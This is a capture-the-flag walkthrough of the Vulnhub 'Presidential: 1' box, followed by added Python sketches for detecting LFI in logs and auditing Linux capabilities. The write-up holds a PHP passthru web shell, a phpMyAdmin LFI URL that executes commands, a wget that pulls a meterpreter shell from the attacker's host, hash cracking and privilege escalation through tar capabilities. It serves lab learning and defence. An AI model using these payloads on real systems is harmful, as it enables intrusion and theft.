Monday, July 20, 2020

Presidential: 1: Vulnhub CTF Walkthrough

Vulnhub: https://www.vulnhub.com/entry/presidential-1,500/ 
** Just a heads up, I was able to import into VMware Workstation without an issue. **
1.  First, doing an nmap scan for the CTF box’s IP Address.  Once discovered, doing an nmap scan for available service ports.

2. We have two available ports, 2082 and port 80.  Port 2082 was an ssh service and port 80 was an Apache service running.
3. We do a dirb scan for port 80 to do directory enumeration.  
4. We also need to observe and enumerate the web pages. I did this using Burp.  I did not find much honestly for a while.  I took note of the domain votenow.local and added it to my hosts file.  However, I was presented with the same information.  
5. This is where I asked for a clue from the author of the CTF.  He mentioned there may be a hidden sub-domain and a backup file that could help get me a foothold to the box.  I never thought of virtual hosts for the box.  I went straight to wfuzz:
wfuzz -c -w /opt/DirBuster/directory-list-2.3-small.txt --hl 282 --hc 400,403,404 -H "Host: FUZZ.votenow.local" -t 100 http://votenow.local
This is where I found datasafe as a possible subdomain.  Time to add it to the host file. 

6. This is where I scanned the hidden subdomain for all kinds of possible backup files.  Nothing. Well, interesting anyway. 
7.  What am I missing?  There must be a backup file somewhere.  I bet it is something simple too. Arrghhh.
8.  Ok, clue number 2.  Author suggested maybe try the main domain.   Of course, I missed that, and it has CREDS!!
User: votebox
Password: casoj3FFASPsbyoRP
9. I was able to get in.  Then, I checked out the Metasploit module to see if it was exploitable: https://www.rapid7.com/db/modules/exploit/multi/http/phpmyadmin_lfi_rce
10. It did not work. Seems like it should have worked. Oh well, let’s check around.
11. So I see the users table.  I see there is a hash for the admin’s user account.  That is all I see but hopefully I can use it somehow. 
* Used the hash from the users table in the web app.  
* hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
12. So we have a username and password.  I was not able to use it to login or get different access to the phpMyAdmin app. Then, again I checked the phpMyAdmin version and checked for vulns again:
* https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/
* https://cupuzone.wordpress.com/2018/07/23/a-little-study-about-latest-phpmyadmin-4-8-0-4-8-1-lfi-vulnerability/
* https://www.exploit-db.com/exploits/44924
* https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e
* https://misduong.blogspot.com/2018/06/phpmyadmin-48x-lfi-to-rce-authorization.html
* https://cxsecurity.com/issue/WLB-2018070139
13.  I can exploit the LFI vuln using the database.  I was able to view the PHP config with phpinfo().  It took a minute to find the exact directory location for my session, but I eventually found it. 


14.  Now, let’s see if we can get a web shell in:   select "<?php passthru($_GET ['cmd']);exit;?>"
15.  http://datasafe.votenow.local/index.php?target=db_sql.php?/../../../../../../../../../../../../../../var/lib/php/session/sess_arnq9b3qlmeupe81tf632qj24qfeb39q&cmd=id
16. It worked.  We now know that the process is running as apache instead of root.  
17.  We should be able to get a better web shell in there.  We just need to host a page and get our small web shell to request the better one.


18.  With a wget, we were able to request it and rename it. We are able to go to the page and now we have our meterpreter web shell working:
http://datasafe.votenow.local/index.php?target=db_sql.php?/../../../../../../../../../../../../../../var/lib/php/session/sess_arnq9b3qlmeupe81tf632qj24qfeb39q&cmd=wget%20http://192.168.126.1/agoonie.php%20-O%20shell.php
19. I looked around for processes running as root.  Also, I looked for anything in the home directories.  There was only the admin dir.  It had two weird text files, user.txt and notes.txt.  Also, noted the version of the OS:  Linux votenow.local 3.10.0-1127.13.1.el7.x86_64 #1 SMP.  
[admin@votenow ~]$ cat notes.txt
cat notes.txt
Reminders:
1) Utilise new commands to backup and compress sensitive files
[admin@votenow ~]$ cat user.txt
cat user.txt
663ba6a402a57536772c6118e8181570
20.  I was stuck here.  Uploaded the LinEnum.sh file.  Looked for sticky bit files, more weird processes, etc.  Found nothing.  Clue number 3: Look up Linux ‘capabilities’ and you will find a file that will help. 
21.  After reading about this, now I got the clues from the text files in the admin folder.  Additional reading:  
* https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/
* https://materials.rangeforce.com/tutorial/2020/02/19/Linux-PrivEsc-Capabilities/
* https://medium.com/@int0x33/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099
22. So I identified the tarS executable that could copy the shadow file and allow us to read it.  I tried to crack it but no dice.  I even thought I could possibly rewrite it and add my own hash to it. Nope. 
23. I remembered about the --checkpoint exploit (wildcard injection). I had it in my notes from the OSCP or a previous CTF but it was worth checking out.  I tried writing a bash script that could possibly escalate me. Noooooope. Wait, it allowed me to read the shadow file. What about reading root’s ssh files??!!
24.  I see the ssh_id file and we have the ssh port.  Hopefully, it is not password protected.  We are in.  

25.  I had to thank the author for a great CTF. It was challenging and yet another reminder, keep reading and learning.
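
For steps 13 to 18, a detection sketch added here (not part of the original post): it scans Apache access-log lines for phpMyAdmin requests whose target parameter carries a '?', directory traversal, or a PHP session file path, as in the URLs above. The log lines, addresses, session ids and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed combined-format log lines; addresses and session ids are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Jul/2020:10:01:02 +0000] "GET /index.php?target=db_sql.php HTTP/1.1" 200 5120
203.0.113.5 - - [20/Jul/2020:10:02:10 +0000] "GET /index.php?target=db_sql.php?/../../../var/lib/php/session/sess_EXAMPLE01&cmd=id HTTP/1.1" 200 812
203.0.113.5 - - [20/Jul/2020:10:02:44 +0000] "GET /index.php?target=db_sql.php%253f/../../../var/lib/php/session/sess_EXAMPLE01 HTTP/1.1" 200 790
203.0.113.9 - - [20/Jul/2020:10:03:00 +0000] "GET /index.php?db=example&table=users HTTP/1.1" 200 4410
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %253f -> %3f -> ?)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return (client, status, reasons) for a suspicious request, else None."""
    match = REQUEST_RE.match(line)
    if not match:
        return None
    client, uri, status = match.groups()
    reasons = []
    # parse_qsl decodes one layer of percent-encoding; fully_decode handles the rest.
    for name, raw in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        if name != "target":
            continue
        value = fully_decode(raw)
        if "?" in value:
            reasons.append("'?' inside target")
        if "../" in value:
            reasons.append("directory traversal")
        if re.search(r"/sess_[A-Za-z0-9,-]+$", value):
            reasons.append("PHP session file path")
    return (client, status, reasons) if reasons else None

def scan(log_text):
    return [hit for line in log_text.splitlines() if (hit := inspect_line(line))]

if __name__ == "__main__":
    for client, status, reasons in scan(SAMPLE_LOG):
        print(client, status, "; ".join(reasons))
```

A 200 status on a flagged line means the server answered the request, so those are the entries to triage first.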
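
For steps 20 to 23, an audit sketch added here (not part of the original post): it parses `getcap -r /` output in both the older `path = caps+flags` and newer `path caps=flags` layouts and reports binaries holding capabilities that defeat file permissions. The sample output is constructed, the path to tarS is a placeholder, and the capability shown on it is an assumption since the post does not state it.

```python
import re

# Capabilities that let a binary sidestep ownership or permission checks.
RISKY = {
    "cap_dac_read_search": "reads any file regardless of permissions",
    "cap_dac_override": "bypasses read/write/execute permission checks",
    "cap_chown": "can change ownership of any file",
    "cap_setuid": "can switch to any UID, including 0",
    "cap_sys_admin": "broad administrative operations",
    "cap_sys_ptrace": "can inspect and modify other processes",
}

# Constructed `getcap -r / 2>/dev/null` output; paths are placeholders and the
# capability on tarS is assumed, not taken from the post.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/path/to/tarS = cap_dac_read_search+ep
/opt/example/helper = cap_setuid+i
/opt/example/backup cap_dac_override,cap_chown=eip
"""

CLAUSE_RE = re.compile(r"([a-z0-9_,]+)[+=]([eip]+)")

def parse_getcap(output):
    """Yield (path, capability, flags) for every capability on every file."""
    for line in output.splitlines():
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        path, rest = parts
        # Older libcap prints "path = caps+ep"; newer prints "path caps=ep".
        for clause in rest.lstrip("= ").split():
            match = CLAUSE_RE.fullmatch(clause)
            if match:
                for cap in match.group(1).split(","):
                    yield path, cap, match.group(2)

def audit(output):
    """Return risky capabilities that are effective or permitted."""
    findings = []
    for path, cap, flags in parse_getcap(output):
        # Inheritable-only ("i") grants nothing when the file is run directly.
        if cap in RISKY and set(flags) & {"e", "p"}:
            findings.append((path, cap, flags, RISKY[cap]))
    return findings

if __name__ == "__main__":
    for path, cap, flags, why in audit(SAMPLE_GETCAP):
        print(f"{path}: {cap} ({flags}) - {why}")
```

Capabilities that are not needed can be cleared from a file with `setcap -r <file>`.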